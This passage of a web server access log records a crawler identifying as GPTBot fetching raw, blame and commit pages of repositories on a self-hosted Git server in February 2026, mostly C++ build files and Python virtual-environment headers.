GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/src-old/old_codec.cpp" +[17/Feb/2026:16:26:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/src-old/old_codec.cpp" [Client 74.7.227.38] [Length 2228] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/src-old/old_codec.cpp" +[17/Feb/2026:16:26:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/src-old/old_codec.cpp" [Client 74.7.227.38] [Length 14058] [Gzip 7.40] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/src-old/old_codec.cpp" +[17/Feb/2026:16:26:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" [Client 74.7.227.38] [Length 6463] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" +[17/Feb/2026:16:26:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeSystem.cmake" [Client 74.7.227.38] [Length 9964] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeSystem.cmake" +[17/Feb/2026:16:26:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeSystem.cmake" [Client 74.7.227.38] [Length 10812] [Gzip 3.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeSystem.cmake" +[17/Feb/2026:16:26:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeSystem.cmake" [Client 74.7.227.38] [Length 422] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeSystem.cmake" +[17/Feb/2026:16:26:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" [Client 74.7.227.38] [Length 9980] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" +[17/Feb/2026:16:26:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" [Client 74.7.227.38] [Length 9969] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" +[17/Feb/2026:16:26:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" [Client 74.7.227.38] [Length 15429] [Gzip 8.26] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" +[17/Feb/2026:16:26:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" [Client 74.7.227.38] [Length 12560] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" +[17/Feb/2026:16:26:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" [Client 74.7.227.38] [Length 21640] [Gzip 28.94] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" +[17/Feb/2026:16:26:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/src-old/old_codec.cpp" [Client 74.7.227.38] [Length 14060] [Gzip 7.40] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/src-old/old_codec.cpp" +[17/Feb/2026:16:26:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/src-old/old_codec.cpp" [Client 74.7.227.38] [Length 14060] [Gzip 7.40] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/src-old/old_codec.cpp" +[17/Feb/2026:16:26:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c?files=PostgresPatrol%2fbuild%2fPostgresPatrol%2fEXE-00.toc" [Client 74.7.227.38] [Length 25137] [Gzip 6.21] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/build/PostgresPatrol/EXE-00.toc" +[17/Feb/2026:16:26:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=1&milestone=-1&state=all&type=all" [Client 74.7.227.38] [Length 9957] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=1&state=all&type=all" +[17/Feb/2026:16:26:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/app/fetcher.py.claude?display=rendered" [Client 74.7.227.38] [Length 10980] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/app/fetcher.py.claude" +[17/Feb/2026:16:26:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/app/fetcher.py.claude?display=source" [Client 74.7.227.38] [Length 15323] [Gzip 4.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/app/fetcher.py.claude" +[17/Feb/2026:16:26:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/app/fetcher.py.claude?display=rendered" [Client 74.7.227.38] [Length 10950] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/app/fetcher.py.claude" +[17/Feb/2026:16:26:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/include/site/python3.12/greenlet" [Client 74.7.227.38] [Length 10053] [Gzip 2.94] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv" +[17/Feb/2026:16:26:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/include/site/python3.12/greenlet" [Client 74.7.227.38] [Length 10086] [Gzip 2.93] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv" +[17/Feb/2026:16:26:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/status.json?display=source" [Client 74.7.227.38] [Length 11055] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/status.json" +[17/Feb/2026:16:26:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX" [Client 74.7.227.38] [Length 10317] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/CMakeFiles/3.31.10" +[17/Feb/2026:16:26:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeSystem.cmake" [Client 74.7.227.38] [Length 11594] [Gzip 3.40] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/3.31.10" +[17/Feb/2026:16:26:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/include/site/python3.12/greenlet/greenlet.h?display=source" [Client 74.7.227.38] [Length 15790] [Gzip 5.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/include/site/python3.12/greenlet/greenlet.h" +[17/Feb/2026:16:26:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/include/site/python3.12/greenlet/greenlet.h?display=rendered" [Client 74.7.227.38] [Length 11107] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/include/site/python3.12/greenlet/greenlet.h" +[17/Feb/2026:16:26:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/include/site/python3.12/greenlet/greenlet.h?display=rendered" [Client 74.7.227.38] [Length 11099] [Gzip 3.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/include/site/python3.12/greenlet/greenlet.h" +[17/Feb/2026:16:26:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/include/site/python3.12/greenlet/greenlet.h?display=source" [Client 74.7.227.38] [Length 15783] [Gzip 5.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/include/site/python3.12/greenlet/greenlet.h" +[17/Feb/2026:16:26:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/status.json?display=source" [Client 74.7.227.38] [Length 11029] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/status.json" +[17/Feb/2026:16:26:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/cmake_clean.cmake" [Client 74.7.227.38] [Length 11600] [Gzip 3.25] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/TestApp.dir" +[17/Feb/2026:16:26:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/app/models.py?display=rendered" [Client 74.7.227.38] [Length 10938] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/app/models.py" +[17/Feb/2026:16:26:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/include" [Client 74.7.227.38] [Length 10316] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/include/site/python3.12/greenlet" +[17/Feb/2026:16:26:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/include/site" [Client 74.7.227.38] [Length 9954] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/include/site/python3.12/greenlet" +[17/Feb/2026:16:26:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" [Client 74.7.227.38] [Length 33675] [Gzip 10.25] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX" +[17/Feb/2026:16:26:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/include/site/python3.12/greenlet/greenlet.h" [Client 74.7.227.38] [Length 15766] [Gzip 5.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/include/site/python3.12/greenlet" +[17/Feb/2026:16:26:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" [Client 74.7.227.38] [Length 11055] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX" +[17/Feb/2026:16:26:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX" [Client 74.7.227.38] [Length 9966] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX" +[17/Feb/2026:16:26:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeSystem.cmake" [Client 74.7.227.38] [Length 9958] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeSystem.cmake" +[17/Feb/2026:16:27:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/include/site/python3.12" [Client 74.7.227.38] [Length 9966] [Gzip 2.91] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/include/site/python3.12/greenlet" +[17/Feb/2026:16:27:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeSystem.cmake" [Client 74.7.227.38] [Length 10806] [Gzip 3.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeSystem.cmake" +[17/Feb/2026:16:27:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/cmake_clean.cmake" [Client 74.7.227.38] [Length 9960] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/cmake_clean.cmake" +[17/Feb/2026:16:27:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/cmake_clean.cmake" [Client 74.7.227.38] [Length 10938] [Gzip 3.82] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/cmake_clean.cmake" +[17/Feb/2026:16:27:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/include" [Client 74.7.227.38] [Length 9930] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/include" +[17/Feb/2026:16:27:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/include/site" [Client 74.7.227.38] [Length 9923] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/include/site" +[17/Feb/2026:16:27:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" [Client 74.7.227.38] [Length 43109] [Gzip 19.39] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" +[17/Feb/2026:16:27:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" [Client 74.7.227.38] [Length 28457] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" +[17/Feb/2026:16:27:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" [Client 74.7.227.38] [Length 9985] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" +[17/Feb/2026:16:27:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr 